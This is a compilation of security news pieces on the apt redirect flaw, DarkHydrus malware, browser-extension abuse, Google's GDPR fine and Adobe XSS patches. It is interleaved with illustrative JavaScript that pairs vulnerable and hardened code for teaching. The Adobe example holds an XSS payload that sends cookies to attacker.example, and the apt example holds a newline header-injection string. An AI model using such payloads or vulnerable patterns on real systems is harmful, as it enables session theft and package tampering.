Just in time… Some cybersecurity experts spent this week arguing on Twitter against using HTTPS for software distribution, suggesting that developers rely solely on signature-based package verification because APT on Linux does the same.

Ironically, a security researcher today revealed details of a new critical remote code execution flaw in the apt-get utility that can be exploited by a remote man-in-the-middle attacker to compromise Linux machines. The flaw once again demonstrates that if the software download ecosystem used HTTPS, attacks of this kind could have been mitigated in the first place.

Discovered by Max Justicz, the vulnerability (CVE-2019-3462) resides in the APT package manager, a widely used utility that handles installation, update and removal of software on Debian, Ubuntu and other Linux distributions.

According to a blog post published by Justicz and details shared with The Hacker News, the APT utility doesn't properly sanitize certain parameters during HTTP redirects, allowing man-in-the-middle attackers to inject malicious content and trick the system into installing altered packages.

APT HTTP redirects let a Linux machine automatically find a suitable mirror from which to download a package when the first server cannot serve it: that server returns a response carrying the location of the next server the client should request the package from.

“Unfortunately, the HTTP fetcher process URL-decodes the HTTP Location header and blindly appends it to the 103 Redirect response,” Justicz explains.

As shown by the researcher in a video demonstration shared with The Hacker News, an attacker intercepting HTTP traffic between the APT utility and a mirror server, or simply a malicious mirror, can inject malicious packages into the network traffic and execute arbitrary code on the targeted system with the highest level of privileges, i.e. root.
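The quoted sentence above is the whole bug class in one line: a header value is decoded and then pasted into a line-oriented protocol message. The following is an added example, written for this page and not apt's own C++ code, that models it. apt's HTTP method reports a redirect to the parent apt process as a "103 Redirect" message made of "Key: value" lines ending in a blank line, carrying the fields URI and New-URI; those field names follow apt's method interface, while the message-building and parsing functions, the hostnames and the Location header below are this example's own constructions.

```javascript
'use strict';

// Added example (this page's illustration, not apt's code). apt's HTTP method
// reports a redirect to the parent apt process as a "103 Redirect" message of
// "Key: value" lines terminated by a blank line, carrying URI and New-URI; the
// field names follow apt's method interface, everything else here is a model.

// Vulnerable construction, as the quoted explanation describes it: the Location
// header is URL-decoded and appended verbatim. An encoded newline (%0A) in the
// header becomes a real line break, and whatever follows it is read by the
// parent process as extra fields of the message.
function vulnerableRedirectMessage(requestedUri, locationHeader) {
  const decoded = decodeURIComponent(locationHeader);
  return `103 Redirect\nURI: ${requestedUri}\nNew-URI: ${decoded}\n\n`;
}

// Hardened construction: never turn the raw header into protocol text, reject
// any value containing control characters (checked before URL parsing, because
// the URL parser silently strips tab/CR/LF), and require an absolute http(s)
// URL so percent-encoded sequences stay encoded inside the single New-URI field.
function hardenedRedirectMessage(requestedUri, locationHeader) {
  if (/[\x00-\x1f\x7f]/.test(locationHeader)) {
    throw new Error('Location header contains control characters');
  }
  let target;
  try {
    target = new URL(locationHeader);
  } catch (e) {
    throw new Error('Location header is not an absolute URL');
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') {
    throw new Error(`refusing redirect to scheme ${target.protocol}`);
  }
  return `103 Redirect\nURI: ${requestedUri}\nNew-URI: ${target.href}\n\n`;
}

// Parent-side parser for the same message shape: status line, then fields.
function parseMethodMessage(text) {
  const lines = text.replace(/\n+$/, '').split('\n');
  const [code, ...status] = lines[0].split(' ');
  const fields = {};
  for (const line of lines.slice(1)) {
    const sep = line.indexOf(':');
    if (sep > 0) fields[line.slice(0, sep)] = line.slice(sep + 1).trim();
  }
  return { code: Number(code), status: status.join(' '), fields };
}

// Constructed inputs: the package the client asked for, and a Location header a
// malicious mirror or on-path attacker could send back. The %0A hides a line
// break that only appears after decoding.
const REQUESTED_URI = 'http://deb.example/debian/pool/main/f/foo/foo_1.0-1_amd64.deb';
const EVIL_LOCATION =
  'http://mirror.example/pool/main/f/foo/foo_1.0-1_amd64.deb%0AInjected-Field:%20attacker-controlled';

function demo() {
  const vuln = parseMethodMessage(vulnerableRedirectMessage(REQUESTED_URI, EVIL_LOCATION));
  const hard = parseMethodMessage(hardenedRedirectMessage(REQUESTED_URI, EVIL_LOCATION));
  return {
    vulnerableFields: vuln.fields, // carries Injected-Field: attacker-controlled
    hardenedFields: hard.fields,   // New-URI keeps the %0A; no extra field appears
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

The point of the hardened form is not the specific regex but the rule behind it: a value that crosses a trust boundary into a line-delimited protocol must be kept in its encoded form or validated after decoding, and a raw newline in an HTTP header must be treated as an attack rather than quietly normalized away.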
“You can completely replace the requested package, as in my proof of concept. You could substitute a modified package as well, if you wanted to,” Justicz told THN.

Though Justicz has not tested it, he believes the vulnerability affects all types of package downloads, whether you are installing a package for the first time or updating an existing one.

No doubt, signature-based verification is important for protecting the integrity of software packages, since software developers have no control over mirror servers, but that does not mean the benefits of HTTPS should be dismissed because of the complexity of infrastructure upgrades in particular cases. No software, platform or server can claim to be 100% secure, so defense in depth is never a bad idea.

It should also be noted that cybersecurity experts do not expect organizations or open-source developers to implement HTTPS overnight, but they should not reject the defensive measure outright either.

“By default, Debian and Ubuntu both use plain http repositories out of the box (Debian lets you pick what mirror you want during installation, but doesn't actually ship with support for https repositories – you have to install apt-transport-https first),” the researcher explains. “Supporting http is fine. I just think it's worth making https repositories the default – the safer default – and allowing users to downgrade their security at a later time if they choose to do so.”

The developers of APT have released updated version 1.4.9 to fix the reported remote code execution vulnerability. Since apt-get is part of many major Linux distributions, including Debian and Ubuntu, which have acknowledged the flaw and released security updates, Linux users are strongly advised to update their systems as soon as possible.
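Since the quoted note says stock Debian and Ubuntu installs ship with plain-http entries, the practical follow-up is to find them. The following is an added example, not apt's or Debian's tooling, that parses one-line sources.list entries of the form `deb|deb-src [options] uri suite [components]`, reports every plain-http mirror and prints the https form of each line. The sample sources.list content is constructed for the example.

```javascript
'use strict';

// Added example (not apt's or Debian's tooling): a check for plain-http mirrors
// in one-line sources.list entries, "deb|deb-src [options] uri suite [components]",
// and the https form of each. The sample input below is constructed.

// Parse one line; returns null for blank/comment lines, {error} for unparsable ones.
function parseSourceLine(line) {
  const body = line.replace(/#.*$/, '').trim();       // strip trailing comments
  if (!body) return null;
  const m = body.match(/^(deb|deb-src)\s+(?:\[([^\]]*)\]\s+)?(\S+)\s+(\S+)\s*(.*)$/);
  if (!m) return { error: body };
  const [, type, options, uri, suite, rest] = m;
  return {
    type,
    options: options ? options.trim() : null,
    uri,
    suite,
    components: rest.split(/\s+/).filter(Boolean),
  };
}

function formatSourceLine(e) {
  const opts = e.options ? `[${e.options}] ` : '';
  return `${e.type} ${opts}${e.uri} ${e.suite} ${e.components.join(' ')}`.trim();
}

// Report every entry fetched over plain http together with its https rewrite.
function auditSources(text) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    const e = parseSourceLine(line);
    if (!e || e.error) return;
    if (/^http:\/\//i.test(e.uri)) {
      findings.push({
        line: i + 1,
        uri: e.uri,
        suggested: formatSourceLine({ ...e, uri: e.uri.replace(/^http:/i, 'https:') }),
      });
    }
  });
  return findings;
}

// Constructed sample resembling a stock Debian 9 sources.list plus a vendor repo
// and a local file: mirror, which is not an http URL and must not be flagged.
const SAMPLE = `
# Debian mirrors as selected at install time
deb http://deb.debian.org/debian stretch main contrib
deb-src http://deb.debian.org/debian stretch main
deb http://security.debian.org/debian-security stretch/updates main
deb [arch=amd64] https://download.docker.com/linux/debian stretch stable
deb file:/srv/mirror/debian stretch main
`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditSources(SAMPLE)) console.log(`line ${f.line}: ${f.uri} -> ${f.suggested}`);
}
```

Before applying a suggested rewrite, confirm that the mirror actually serves HTTPS and, on older APT releases, that apt-transport-https is installed first, as Justicz's note above points out; otherwise apt will fail to fetch rather than fall back to http.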

Source

By Waqas. DarkHydrus is back in action with a new variant of the RogueRobin malware, targeting Middle Eastern politicians by abusing Google Drive. The primary focus of cybercriminals nowadays is to use the infrastructure of genuine services in their attacks in order to evade detection by security tools. The same strategy has been adopted by the DarkHydrus group […] This is a post from HackRead.com. Read the original post: DarkHydrus Phishery tool spreading malware using Google Drive

Source

Researchers have added another reason to be suspicious of web browser extensions. According to a recently published academic report, various Chrome, Firefox and Opera browser extensions can be abused by an adversary to steal sensitive browser data and plant arbitrary files on targeted systems.

“We identified a good number of extensions that can be exploited by web applications to benefit from their privileged capabilities,” wrote Université Côte d’Azur researcher Dolière Francis Somé in an academic paper titled Empowering Web Applications with Browser Extensions (PDF).

A web application is a client-server program that runs in a web browser, such as an online form or a browser-based word processor. That is separate from a browser extension, a small software add-on that customizes a web browser with something like an ad-blocker or a web-clipping tool.

“[Browser extensions] have access to sensitive user information, including browsing history, bookmarks, credentials (cookies) and list of installed extensions,” Somé pointed out. “They have access to a permanent storage in which they can store data as long as they are installed in the user’s browser. They can trigger the download of arbitrary files and save them on the user’s device.”

Web applications have no such access: they are subject to the Same Origin Policy (SOP), which bars a page from reading or writing user data belonging to other domains. The research, however, demonstrates how a specially crafted web application can bypass SOP protections by exploiting privileged browser extensions.

“Our results demonstrate that the communications between browser extensions and web applications pose serious security and privacy threats to browsers, web applications and more importantly to users,” according to the research.
The attack, according to the paper, would follow this example: “An attacker [uses] a script that is present in a web application currently running in the user browser. The script either belongs to the web application or to a third party. The goal of the attacker is to interact with installed extensions, in order to access user sensitive information. It relies on extensions whose privileged capabilities can be exploited via an exchange of messages with scripts in the web application.”

The paper adds, “Even though content scripts, background pages and web applications run in separate execution contexts, they can establish communication channels to exchange messages with one another… APIs [are used] for sending and receiving (listening for) messages between the content scripts, background pages and web applications.”

Somé focused on extensions built on the WebExtensions API, a cross-browser extension system supported by major browsers including Chrome, Firefox, Opera and Microsoft Edge. After analyzing 78,315 such extensions, the study flagged 3,996 as suspicious. While that seems voluminous, Somé noted that the number of confirmed vulnerable extensions is small overall, and that concern should be measured. However, “browser vendors need to review extensions more rigorously, in particular take into consideration the use of message passing interfaces in extensions.”
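The message chain the paper describes (page script to content script to background page) is where the check has to live, so here is an added example, written for this page and not taken from the paper or from any real extension, that models it in Node. The `browser.downloads` and `browser.cookies` stand-ins, the extension's allowed origin `https://app.example`, its CDN host `cdn.app.example` and the attacker page `https://evil.example` are all assumptions constructed for the example. The vulnerable pair relays any `window.postMessage` payload to a background page that acts on it unchecked; the hardened pair checks `event.source` and `event.origin` in the content script, forwards only a fixed message shape, and re-validates the browser-supplied `sender.url` and the requested URL on the privileged side.

```javascript
'use strict';

// Added example (not from the paper or from any real extension): a Node model of
// the content-script / background-page message chain the article describes, with
// a constructed stand-in for the privileged browser.* APIs so it runs offline.

function makeFakeBrowser() {
  const calls = [];                                   // records privileged actions
  return {
    calls,
    downloads: { download: (o) => { calls.push(['download', o.url]); return calls.length; } },
    cookies: { getAll: (q) => { calls.push(['cookies', q.domain]); return [{ name: 'sid', value: 'secret' }]; } },
  };
}

// ---- Vulnerable pattern ------------------------------------------------------
// Content script: forwards any window.postMessage payload to the background page
// without looking at who sent it. Background: does whatever the payload asks.
function vulnerableContentScript(event, runtimeSendMessage) {
  return runtimeSendMessage(event.data);
}
function vulnerableBackground(browser, msg) {
  switch (msg.type) {
    case 'download': return browser.downloads.download({ url: msg.url });
    case 'cookies':  return browser.cookies.getAll({ domain: msg.domain });
    default:         return null;
  }
}

// ---- Hardened pattern --------------------------------------------------------
// Assumptions for the example: the extension serves one site, and may only fetch
// files from that site's CDN.
const ALLOWED_ORIGINS = new Set(['https://app.example']);
const ALLOWED_DOWNLOAD_HOSTS = new Set(['cdn.app.example']);

function hardenedContentScript(event, runtimeSendMessage, window) {
  if (event.source !== window) return { error: 'message not from this window' };
  if (!ALLOWED_ORIGINS.has(event.origin)) return { error: 'origin not allowed' };
  const { type, url } = event.data || {};
  if (type !== 'download' || typeof url !== 'string') return { error: 'bad message' };
  return runtimeSendMessage({ type, url });          // fixed shape, nothing else forwarded
}
function hardenedBackground(browser, msg, sender) {
  // Re-check on the privileged side: sender.url comes from the browser, not the page.
  let senderOrigin;
  try { senderOrigin = new URL(sender.url).origin; } catch (e) { return { error: 'bad sender' }; }
  if (!ALLOWED_ORIGINS.has(senderOrigin)) return { error: 'sender not allowed' };
  if (msg.type !== 'download') return { error: 'unsupported request' };
  let target;
  try { target = new URL(msg.url); } catch (e) { return { error: 'bad url' }; }
  if (target.protocol !== 'https:' || !ALLOWED_DOWNLOAD_HOSTS.has(target.host)) {
    return { error: 'download host not allowed' };
  }
  return browser.downloads.download({ url: target.href });
}

// Wire the two halves together the way the browser does: runtime.sendMessage on
// the content side arrives at the background's onMessage listener with a sender
// object whose url is the tab's real URL.
function runScenario(contentScript, background, pageUrl, msg) {
  const browser = makeFakeBrowser();
  const window = { location: { href: pageUrl } };
  const runtimeSendMessage = (m) => background(browser, m, { url: pageUrl });
  const event = { origin: new URL(pageUrl).origin, source: msg.fromOwnWindow ? window : {}, data: msg.data };
  const result = contentScript(event, runtimeSendMessage, window);
  return { result, calls: browser.calls };
}

// Constructed attack: a (first- or third-party) script on an attacker page asks the
// extension to save a file and to read another site's cookies.
const ATTACK_PAGE = 'https://evil.example/';
const DOWNLOAD_REQ = { fromOwnWindow: true, data: { type: 'download', url: 'https://evil.example/payload.exe' } };
const COOKIE_REQ   = { fromOwnWindow: true, data: { type: 'cookies', domain: 'bank.example' } };
const LEGIT_REQ    = { fromOwnWindow: true, data: { type: 'download', url: 'https://cdn.app.example/report.pdf' } };

function demo() {
  return {
    vulnDownload: runScenario(vulnerableContentScript, vulnerableBackground, ATTACK_PAGE, DOWNLOAD_REQ).calls,
    vulnCookies:  runScenario(vulnerableContentScript, vulnerableBackground, ATTACK_PAGE, COOKIE_REQ).calls,
    hardDownload: runScenario(hardenedContentScript, hardenedBackground, ATTACK_PAGE, DOWNLOAD_REQ).calls,
    hardCookies:  runScenario(hardenedContentScript, hardenedBackground, ATTACK_PAGE, COOKIE_REQ).calls,
    hardLegit:    runScenario(hardenedContentScript, hardenedBackground, 'https://app.example/', LEGIT_REQ).calls,
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

Two design points carry over to real extensions: the content script's origin check alone is not enough, because a content script runs in the page's context and its checks can be confused, so the background page must re-validate using the `sender` object the browser fills in; and the privileged side should never accept free-form targets (an arbitrary URL or cookie domain) from page-originated messages, only narrowly typed requests against an allow list.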

Source

France’s National Data Protection Commission (CNIL) has fined Google $57 million (€50 million) for violations of the General Data Protection Regulation (GDPR), the largest fine yet issued under the EU’s new data privacy law.

Investigating group complaints from the privacy advocacy groups None Of Your Business and La Quadrature du Net (the latter representing 10,000 citizens), CNIL found Google lacking in transparency about how it collects and handles user data in the name of serving personalized ads.

“Despite the measures implemented by Google (documentation and configuration tools), the infringements observed deprive the users of essential guarantees regarding processing operations that can reveal important parts of their private life, since they are based on a huge amount of data, a wide variety of services and almost unlimited possible combinations,” CNIL said in a Monday statement.

The regulator also noted the scope of the violations’ impact. “The violations are continuous breaches of the Regulation as they are still observed to date. It is not a one-off, time-limited, infringement,” it said, adding, “taking into account the important place that the operating system Android has on the French market, thousands of French people create, every day, a Google account when using their smartphone.”

GDPR Violations

Under the GDPR, processing personal data requires a lawful basis; where that basis is the user's consent, as it is for ad personalization in this case, the consent must be obtained before any data is collected, let alone kept or used for follow-on purposes such as targeted advertising. This covers information gleaned from websites, account registrations, social media, advertising and marketing efforts, newsletters and list rentals, data brokerages, public sources and more. That profoundly changes the way an American company such as Google’s subsidiary DoubleClick profiles and targets ads to internet users in the E.U.
In this case, the French regulator determined that information from Google about how data is collected, collated and used across as many as 20 different Google services is relatively obscured. The internet giant, according to CNIL, breaks up the information across several documents, so that the full extent of Google’s data processing practices can only be uncovered by going down a rabbit hole of several links. “The relevant information is accessible after several steps only, implying sometimes up to five or six actions,” CNIL said on Monday in its statement. “For instance, this is the case when a user wants to have complete information on his or her data collected for the personalization purposes or for the geo-tracking service.” Further, even after accessing the pertinent information, the documents lack detail in terms of exactly where and how user data is utilized for advertising purposes, according to CNIL. “The [data] processing operations are particularly massive and intrusive because of the number of services offered (about 20), [and] the amount and the nature of the data [being] processed and combined,” the regulator explained. Google’s practices are “described in a too generic and vague manner, and so are the categories of data processed for these various purposes.” As such, CNIL determined that Google doesn’t obtain valid consent from users to use their data for ad personalization – explicit consent being a key requirement of the GDPR. “The users’ consent is not sufficiently informed…[because the information] is diluted in several documents and does not enable the user to be aware of their extent,” the authority noted. Thus, “the collected consent is neither ‘specific’ nor ‘unambiguous.'” CNIL added that even though users can modify their account options to opt out of seeing personalized ads, the option to see them is pre-ticked, meaning there is no “clear affirmative action from the user (by ticking a non-pre-ticked box for instance)” to receive the ads. 
And finally, before creating an account, the user is asked to tick a box for “I agree to Google’s Terms of Service” and “I agree to the processing of my information as described above and further explained in the Privacy Policy.” However, CNIL said this consent isn’t specific and matched to a distinct purpose, and therefore does not satisfy GDPR rules.

GDPR Enforcement Ramps Up

The Google fine is far and away the largest penalty issued since the GDPR went into effect last May. However, it could have been much larger: GDPR violations can incur fines of up to 4 percent of global annual turnover.

While the GDPR is a European regulation, it affects any organization that handles data on individuals in the E.U., whether they are customers or partners, including American companies. That means any entity in the U.S. is subject to enforcement actions, such as fines, if it does business with people in the E.U. In other words, it’s an E.U. law with global applicability.

Enforcement actions have been slow to roll out, largely because it takes time to build a consensus on how to determine compliance. The GDPR contains a series of articles that lay out a complex set of requirements for those handling E.U. personal data. Yet in terms of what compliance actually looks like in the real world, there are several areas of uncertainty that will only be clarified over time.

Google is the largest fish caught in the GDPR net to date, but it surely won’t be the last. Over the course of the fall, Data Protection Authorities (DPAs) in various countries began joining the enforcement fray, a state of affairs that’s unlikely to wane anytime soon.

Some of the actions have not carried fines. The U.K.’s Information Commissioner’s Office (ICO), for instance, found in October that Canada-based AggregateIQ Data Services had used personal data, including names and email addresses, of U.K. individuals to target them with political advertising messages on social media without their consent. The ICO ordered AggregateIQ to erase any personal data of U.K. individuals retained on its servers. Similarly, in France, CNIL recently found that a mobile marketing and ad tech agency, Vectaury, had illegally obtained the consent of more than 67 million people to collect their data; it too was ordered to purge all personal data of the affected individuals.

On the financial penalty front, in September Austria’s Österreichische Datenschutzbehörde fined a retailer €4,800 for using a surveillance camera that recorded passersby without their consent. Portugal’s Comissão Nacional de Protecção de Dados fined a hospital, Barreiro Montijo, €400,000 for not restricting employee access to patient data. Most recently, Germany’s State Commissioner for Data Protection and Freedom of Information for Baden-Württemberg fined a German social-media company, the maker of the flirting app “Knuddels”, €20,000 in November after a data breach: it came to light that the service had been storing user passwords in plain text, without the pseudonymization and encryption of personal data that the GDPR requires.

Source

Adobe has issued unscheduled patches for vulnerabilities rated “important” across its Experience Manager platform, which allows developers to create mobile apps, social campaigns and landing pages.

Overall, Adobe issued three fixes: an “important” flaw (CVE-2018-19726) and a “moderate” flaw (CVE-2018-19727) in Adobe Experience Manager, and an “important” vulnerability (CVE-2018-19724) in Adobe Experience Manager Forms.

The important vulnerability in Adobe’s Experience Manager platform impacts versions 6.0 through 6.4 of the product. The flaw is a stored cross-site scripting bug that could lead to sensitive information disclosure.

Stored cross-site scripting is the most dangerous type of cross-site scripting, according to researchers with Imperva. This type of attack occurs when a web application accepts potentially malicious input from a user and stores it in a data store, from which it is later rendered into pages served to other users. The attack could be used to hijack another user’s browser session, capture sensitive information or carry out other malicious actions.

Adobe said that the update for this is a priority 2, meaning that it resolves flaws in a product that has historically been at elevated risk, but for which there are currently no known exploits.

The moderate-rated flaw, meanwhile, is a reflected cross-site scripting vulnerability that could lead to sensitive information disclosure. It specifically impacts Adobe Experience Manager versions 6.3 and 6.4. Reflected cross-site scripting occurs when attacker-supplied input is echoed back as browser-executable code in a single HTTP response. This variant is less severe because the payload is not stored within the application itself: the attack is non-persistent and only affects users who open a maliciously crafted link or third-party web page.

On the Experience Manager Forms front, Adobe released a fix for an important stored cross-site scripting flaw.
The forms are often used in large enterprises to create and reuse digital forms by copying them to a content management system. “Adobe has released security updates for Adobe Experience Manager Forms,” the company said in its release. “These updates resolve a stored cross-site scripting vulnerability rated important that could result in sensitive information disclosure.” The flaw specifically impacts versions 6.2, 6.3 and 6.4 of Adobe Experience Manager Forms, and is also a priority-2 update. Researcher Adam Willard was credited with reporting the flaw.

Adobe’s latest fixes come after its regularly scheduled update in January, in which it released patches for two bugs rated important in its Adobe Digital Editions and Adobe Connect products: an information-disclosure bug in Digital Editions, Adobe’s eBook reader, and a session-token exposure bug in Adobe Connect, its presentation and web conferencing software. In another unscheduled update in January, the company fixed two critical flaws in Adobe Acrobat and Reader for Windows and macOS. The two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725, could be exploited to achieve arbitrary code execution in the context of the current user.
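The stored-versus-reflected distinction the article draws is easiest to see with the two render paths side by side. The following is an added example written for this page; it is not Adobe's code and does not reproduce the AEM bugs, only the generic pattern: a comment store rendered to every later visitor (stored), a search parameter echoed into one response (reflected), and the same output encoding applied to both. The in-memory comment store, the attacker's cookie-exfiltration payload and the `attacker.example` host are constructed for the example.

```javascript
'use strict';

// Added example (not Adobe's code and not the AEM bugs themselves): the stored
// and reflected cross-site scripting patterns the article contrasts, each shown
// with unescaped output beside the output-encoded fix. The data store and the
// request are constructed in memory.

// Encode the five characters that can break out of HTML text context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Stored XSS: input saved on one request is rendered into pages served to every
// later visitor, so the payload persists in the application's data store.
function renderComments(store, escape) {
  return '<ul>' + store.map((c) => `<li><b>${escape(c.author)}</b>: ${escape(c.body)}</li>`).join('') + '</ul>';
}
const identity = (s) => String(s);                 // the "no encoding" vulnerable path
const renderCommentsVulnerable = (store) => renderComments(store, identity);
const renderCommentsFixed      = (store) => renderComments(store, escapeHtml);

// Reflected XSS: a request parameter is echoed into this single response only;
// nothing is stored, so a victim has to follow a crafted link to be hit.
const renderSearchVulnerable = (query) => `<p>Results for ${identity(query)}</p>`;
const renderSearchFixed      = (query) => `<p>Results for ${escapeHtml(query)}</p>`;

// Would a browser execute a script from this markup? (text-context check only)
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Constructed payload of the kind that turns an XSS bug into information
// disclosure: it ships the victim's cookie to a host the attacker controls.
const PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

function demo() {
  const store = [{ author: 'alice', body: 'first!' }, { author: 'mallory', body: PAYLOAD }];
  return {
    storedVulnerable:    containsLiveScript(renderCommentsVulnerable(store)),   // true
    storedFixed:         containsLiveScript(renderCommentsFixed(store)),        // false
    reflectedVulnerable: containsLiveScript(renderSearchVulnerable(PAYLOAD)),   // true
    reflectedFixed:      containsLiveScript(renderSearchFixed(PAYLOAD)),        // false
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

`escapeHtml` is correct only for HTML text context; values placed inside attributes, URLs, inline JavaScript or CSS each need their own encoder, and a Content-Security-Policy that forbids inline scripts is the defense-in-depth layer that limits the damage when an encoder is missed.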

Source

The French data protection watchdog CNIL has issued its first fine of €50 million (around $57 million) under the European Union's new General Data Protection Regulation (GDPR), which came into force in May last year.

The fine has been levied on Google for “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization,” the CNIL (National Data Protection Commission) said in a press release issued today. It follows a CNIL investigation opened after two non-profit organizations, None Of Your Business (NOYB) and La Quadrature du Net (LQDN), filed complaints against the company in May 2018.

Why Has Google Been Fined?

According to the CNIL, Google has been found to violate two core requirements of the GDPR: transparency and consent.

First, the search giant makes it too difficult for users to find essential information, like the “data-processing purposes, the data storage periods or the categories of personal data used for the ads personalisation,” by scattering it across several documents behind buttons and links, so that reaching it takes up to six separate actions. Even when users find the information they are looking for, the CNIL says it is “not always clear nor comprehensive.”

“Users are not able to fully understand the extent of the processing operations carried out by Google,” the Commission says. “Similarly, the information communicated is not clear enough so that the user can understand that the legal basis of processing operations for the ads personalization is the consent and not the legitimate interest of the company.”

Secondly, Google does not obtain valid consent from its users to process data for ads personalization purposes.
According to the CNIL, the option to personalize ads is “pre-ticked” when creating an account with Google, so users never take the clear affirmative action the GDPR requires before their data may be processed for ads personalization.

Finally, the CNIL says that when creating an account, users are asked to tick the boxes “I agree to Google’s Terms of Service” and “I agree to the processing of my information as described above and further explained in the Privacy Policy.” Blanket consent like this is also invalid under the GDPR, because it is not specific to each purpose. “The user gives his or her consent in full, for all the processing operations purposes carried out by Google based on this consent (ads personalization, speech recognition, etc.),” the Commission says.

Although the €50 million fine seems large, it is small compared with the maximum penalty the GDPR allows for a company of Google's size: €20 million or 4 percent of annual global turnover, whichever is higher.

Besides Google, NOYB and LQDN also filed complaints against Facebook in May, so let's see what happens to Facebook next.

Other Record Fines On Google

It's not the first time Google has been fined in Europe. Back in July, the company was hit with a record $5 billion fine by the EU in an Android antitrust case, which Google is currently appealing. A few months later, the search giant overhauled its Android business model in Europe, electing to charge a fee to European Android phone manufacturers who want to include its apps on their handsets. The EU also hit Google with a separate antitrust penalty of $2.7 billion (€2.4 billion) in 2017 over shopping-search results in Google Search.

In response to the GDPR fine imposed by France, Google said in a statement: “People expect high standards of transparency and control from us. We're deeply committed to meeting those expectations and the consent requirements of the GDPR. We’re studying the decision to determine our next steps.”

Source

Since most security tools also keep an eye on network traffic to detect malicious IP addresses, attackers are increasingly adopting the infrastructure of legitimate services in their attacks to hide their malicious activities.

Cybersecurity researchers have now spotted a new malware attack campaign linked to the notorious DarkHydrus APT group that uses Google Drive as its command-and-control (

Source